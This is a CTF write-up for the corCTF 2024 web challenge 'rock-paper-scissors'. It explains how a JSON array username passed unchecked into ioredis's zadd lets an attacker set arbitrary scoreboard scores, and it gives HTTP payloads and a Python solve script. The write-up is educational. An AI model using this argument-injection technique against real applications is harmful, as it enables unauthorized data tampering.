siunam's Website

My personal website

Home Writeups Research Blog Projects About

rock-paper-scissors

Table of Contents

  1. Overview
  2. Background
  3. Enumeration
    3.1. After the CTF Ended
  4. Exploitation
  5. Conclusion

Overview

Background

can you beat fizzbuzz at rock paper scissors?

Enumeration

Index page:

Upon visiting, we're met with a prompt, which requires us to submit our username:

Burp Suite HTTP history:

After submitting our username, it'll send a POST request to /new, with a JSON body data. Then, the server respond us with a new cookie called session.

In the session cookie's value, it starts with ey, which is base64 encoded character { (I knew this from experience). Also, it has 3 parts and the delimiter is .. That being said, the session cookie is a JWT (JSON Web Token).

Now, in the index page, we can click one of those three buttons to play the game "Rock paper scissors":

Burp Suite HTTP history:

After clicking, it'll send a POST request to /play, with a JSON body data. If we lose the game, the server will respond us with JSON key state value end.

Also, we can click the "Scoreboard" link to see all the scores:

As you can see, I have 0 score, and user FizzBuzz101 has 1336.

Hmm… Based on this challenge's description, we need to somehow beat user FizzBuzz101, which means we need to achieve score greater than 1336.

There's not much we can do in here! Let's read this web application's source code!

In this challenge, we can download a file:

┌[siunam♥Mercury]-(~/ctf/corCTF-2024/web/rock-paper-scissors)-[2024.07.29|18:26:06(HKT)]
└> file rock-paper-scissors.tar.gz 
rock-paper-scissors.tar.gz: gzip compressed data, from Unix, original size modulo 2^32 81920
┌[siunam♥Mercury]-(~/ctf/corCTF-2024/web/rock-paper-scissors)-[2024.07.29|18:26:09(HKT)]
└> tar xvzf rock-paper-scissors.tar.gz 
rock-paper-scissors/
rock-paper-scissors/docker-compose.yml
rock-paper-scissors/index.js
rock-paper-scissors/package-lock.json
rock-paper-scissors/package.json
rock-paper-scissors/static/
rock-paper-scissors/static/main.js
rock-paper-scissors/static/scoreboard.html
rock-paper-scissors/static/scoreboard.js
rock-paper-scissors/static/index.html
rock-paper-scissors/Dockerfile

After reading the source code, we can have the following findings:

  1. The web application is written in Node.js with Fastify web framework
  2. The JWT signing and verification uses Fastify's jwt
  3. The database is using Redis, a memory-based database. The web application uses the ioredis as the Redis client

Now, let's dive into the rock-paper-scissors/index.js, the main logic of this web application.

First off, what's our objective of this challenge? Where's the flag?

In GET route /flag, we can see that after the application verifying our JWT, it'll query the Redis database and get our username's score. If our score is greater than 1336, it'll return the flag:

import Redis from 'ioredis';
import fastify from 'fastify';
[...]
import fastifyJwt from '@fastify/jwt';
[...]
const redis = new Redis(6379, "redis");
const app = fastify();
[...]
app.register(fastifyJwt, { secret: process.env.SECRET_KEY || randomBytes(32), cookie: { cookieName: 'session' } });

app.register(fastifyCookie);

await redis.zadd('scoreboard', 1336, 'FizzBuzz101');
[...]
app.get('/flag', async (req, res) => {
    try {
        await req.jwtVerify();
    } catch(e) {
        return res.status(400).send({ error: 'invalid token' });
    }
    const score = await redis.zscore('scoreboard', req.user.username);
    if (score && score > 1336) {
        return res.send(process.env.FLAG || 'corctf{test_flag}');
    }
    return res.send('You gotta beat Fizz!');
})

With that said, our objective is somehow reach to score > 1336.

Hmm… Now I wonder how the game's logic works.

In POST route /play, the application randomly picks 🪨 (rock), 📃 (paper), or ✂️ (scissor) via randomInt from the crypto module provided by Node.js.

If our throw matches the application one, the Redis client increments 1 of our game's score. Otherwise the Redis client gets the final score of our game, delete the key, and add/update the final score to key scoreboard:

import { randomBytes, randomInt } from 'node:crypto';
[...]
const winning = new Map([
    ['🪨', '📃'],
    ['📃', '✂️'],
    ['✂️', '🪨']
]);
[...]
app.post('/play', async (req, res) => {
    try {
        await req.jwtVerify();
    } catch(e) {
        return res.status(400).send({ error: 'invalid token' });
    }
    const { game, username } = req.user;
    const { position } = req.body;
    const system = ['🪨', '📃', '✂️'][randomInt(3)];
    if (winning.get(system) === position) {
        const score = await redis.incr(game);

        return res.send({ system, score, state: 'win' });
    } else {
        const score = await redis.getdel(game);
        if (score === null) {
            return res.status(404).send({ error: 'game not found' });
        }
        await redis.zadd('scoreboard', score, username);
        return res.send({ system, score, state: 'end' });
    }
});

Cool. How about the JWT signing logic?

In POST route /new, it generates a new random game ID and set the game ID's score to 0. After that, it signs the JWT with our username and the game ID:

app.post('/new', async (req, res) => {
    const { username } = req.body;
    const game = randomBytes(8).toString('hex');
    await redis.set(game, 0);
    return res.setCookie('session', await res.jwtSign({ username, game })).send('OK');
});

Now, let's think about how can we achieve score that's greater than 1336.

When this web application is started, it uses ioredis's class Redis's method zadd to add username FizzBuzz101 with score 1336 into the Redis database.

Since there's no checks to validate duplicated usernames, can we use username FizzBuzz101 and win a game to gain score 1337?

Well, nope. When the application generates a new game ID via class Redis method set, it sets the score to 0. If we win a game, the score will be incremented to 1. If we then lose the game, it just update the username FizzBuzz101's score to 1.

Hmm… Maybe we can predict the application's random throw via randomInt? Unfortunately, also a big nope. The randomInt method from crypto module is generated by CPRNG (Cryptographically Secure Pseudorandom Number Generator). Therefore, we can't predict the application's throw.

I also thought about batch request, which means sending all the possible position values. However, our position check is compared via strict comparison (===):

if (winning.get(system) === position) {
[...]

So nope, it also checks the type of our position.

Based on the sources and sinks model, we could try to figure out how we can achieve score greater than 1336.

The sink (Dangerous function) in this case, is class Redis method zadd in POST route /play:

app.post('/play', async (req, res) => {
    [...]
    if (winning.get(system) === position) {
        [...]
    } else {
        [...]
        await redis.zadd('scoreboard', score, username);
        [...]
    }
});

If we can somehow add/update our score to be greater than 1336, we're can get the flag!

The sources (User inputs) in the above sink, is our username:

app.post('/play', async (req, res) => {
    try {
        await req.jwtVerify();
    } catch(e) {
        return res.status(400).send({ error: 'invalid token' });
    }
    const { game, username } = req.user;
    [...]
});

However, my small brain cannot comprehend what could go wrong between our username and method zadd.

After the CTF Ended

After reading some writeups when the CTF ended, I learned that we can parse our username as an array into the zadd method!

If we Google "ioredis zadd", there's a result of this GitHub Issue:

After reading a little bit, this comment brought my attention:

[…]Since ioredis flattens arguments, the following form is supported:

redis.zadd('key', [17, 'a'], [18, 'b'], [19, 'c'])

Huh? Wait it supports multiple scores??

If we look at the Redis official documentation about command ZADD (I was looking at the ioredis documentation smh), the syntax is like the following:

ZADD key [NX | XX] [GT | LT] [CH] [INCR] score member [score member...]

For simplicity, we'll ignore those optional arguments in the middle (Arguments that are in brackets, such as [NX]):

ZADD key score member [score member...]

As you can see, the ZADD command actually supports multiple score and member pair. For instance, the following ZADD command set key scoreboard's score 123 to dummy_username and score 1337 to flag_username:

ZADD scoreboard 123 "dummy_username" 1337 "flag_username"

In this challenge, there's no type validation at all, so we can parse our username as an array to trick the zadd method to set multiple members' score!

Exploitation

To test this, we can build the Docker images and run the containers locally:

┌[siunam♥Mercury]-(~/ctf/corCTF-2024/web/rock-paper-scissors)-[2024.07.29|19:36:31(HKT)]
└> cd rock-paper-scissors   
┌[siunam♥Mercury]-(~/ctf/corCTF-2024/web/rock-paper-scissors/rock-paper-scissors)-[2024.07.29|19:36:33(HKT)]
└> docker compose -f "docker-compose.yml" up -d --build
[...]

Now, to check the Redis logs in real-time, we can go to our Redis container and use command MONITOR:

┌[siunam♥Mercury]-(~/ctf/corCTF-2024/web/rock-paper-scissors/rock-paper-scissors)-[2024.07.29|19:41:55(HKT)]
└> docker container list
CONTAINER ID   IMAGE                       COMMAND                  CREATED              STATUS              PORTS                                         NAMES
5dc55349c71a   rock-paper-scissors-chall   "docker-entrypoint.s…"   About a minute ago   Up About a minute   0.0.0.0:8080->8080/tcp, :::8080->8080/tcp     rock-paper-scissors-chall-1
3efdf78fc5dc   redis                       "docker-entrypoint.s…"   About a minute ago   Up About a minute   0.0.0.0:32769->6379/tcp, :::32769->6379/tcp   rock-paper-scissors-redis-1
┌[siunam♥Mercury]-(~/ctf/corCTF-2024/web/rock-paper-scissors/rock-paper-scissors)-[2024.07.29|19:42:17(HKT)]
└> docker exec -it 3efdf78fc5dc /bin/bash                                               
root@3efdf78fc5dc:/data# redis-cli monitor
OK

Then, we can go to localhost:8080 and test it!

First, we'll need to let the application to sign our JWT with the following payload and get the session cookie:

POST /new HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Content-Length: 52

{
  "username": [
    "dummy_username",
    1337,
    "flag_username"
  ]
}

Then, use the new session cookie to lose once in the game at POST route /play:

POST /play HTTP/1.1
Host: localhost:8080
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6WyJkdW1teV91c2VybmFtZSIsMTMzNywiZmxhZ191c2VybmFtZSJdLCJnYW1lIjoiYzMxNWFiMzQ1MDVlMjA4ZiIsImlhdCI6MTcyMjI1MzY4N30.Y9hb-dnr-jPv7xU7LiUcd-WPWq3PTxXBjBzsFondsdc
Content-Type: application/json
Content-Length: 15

{
  "position": ""
}

In our Redis log, we should see this:

1722253842.766544 [0 172.18.0.3:45722] "zadd" "scoreboard" "0" "dummy_username" "1337" "flag_username"

As you can see, the ZADD command sets score 0 to dummy_username, score 1337 to flag_username.

If we check the scoreboard, we should be able to see username flag_username has score 1337:

Nice! We can try to get the flag at GET route /flag.

But before we do that, make sure our JWT's username claim is flag_username:

POST /new HTTP/1.1
Host: localhost:8080
Content-Type: application/json
Content-Length: 28

{
  "username":"flag_username"
}

GET /flag HTTP/1.1
Host: localhost:8080
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImZsYWdfdXNlcm5hbWUiLCJnYW1lIjoiNWE4OGViYWUzNDBiZmI5YSIsImlhdCI6MTcyMjI1NDExNH0.pJ133i6k0bAAJ3yw-2NWJIGZVF_1gt_CEai6P4Ryjzc


Nice!

Now, let's write a solve script to get the real flag!

#!/usr/bin/env python3
import requests

class Solver:
    def __init__(self, baseUrl):
        self.baseUrl = baseUrl
        self.session = requests.session()
        self.CREATE_NEW_USERNAME_ENDPOINT = f'{self.baseUrl}/new'
        self.DUMMY_USERNAME = 'dummy_username'
        self.SET_TO_SCORE = 1337
        self.FLAG_USERNAME = 'flag_username'
        self.PLAY_GAME_ENDPOINT = f'{self.baseUrl}/play'
        self.GET_FLAG_ENDPOINT = f'{self.baseUrl}/flag'

    def createNewUsername(self, bodyData):
        print(f'[*] Creating new username with body data: {bodyData}')
        self.session.post(self.CREATE_NEW_USERNAME_ENDPOINT, json=bodyData)

    def playGame(self):
        print(f'[*] Losing the game intentionally...')
        bodyData = { 'position': '' }
        self.session.post(self.PLAY_GAME_ENDPOINT, json=bodyData)

    def getFlag(self):
        print(f'[*] Getting the flag...')
        return self.session.get(self.GET_FLAG_ENDPOINT).text

    def solve(self):
        bodyData = {
            'username': [
                self.DUMMY_USERNAME,
                self.SET_TO_SCORE,
                self.FLAG_USERNAME
            ]
        }
        self.createNewUsername(bodyData)
        self.playGame()

        bodyData = { 'username': self.FLAG_USERNAME }
        self.createNewUsername(bodyData)

        flag = self.getFlag()
        if not flag:
            print('[-] We couldn\'t get the flag!')
            return

        print(f'[+] We got the flag: {flag}')

if __name__ == '__main__':
    baseUrl = 'https://rock-paper-scissors-c0a55f84c298d61f.be.ax'
    solver = Solver(baseUrl)

    solver.solve()
┌[siunam♥Mercury]-(~/ctf/corCTF-2024/web/rock-paper-scissors)-[2024.07.29|20:08:48(HKT)]
└> python3 solve.py
[*] Creating new username with body data: {'username': ['dummy_username', 1337, 'flag_username']}
[*] Losing the game intentionally...
[*] Creating new username with body data: {'username': 'flag_username'}
[*] Getting the flag...
[+] We got the flag: corctf{lizard_spock!_a8cd3ad8ee2cde42}

Conclusion

What we've learned:

  1. Missing type validation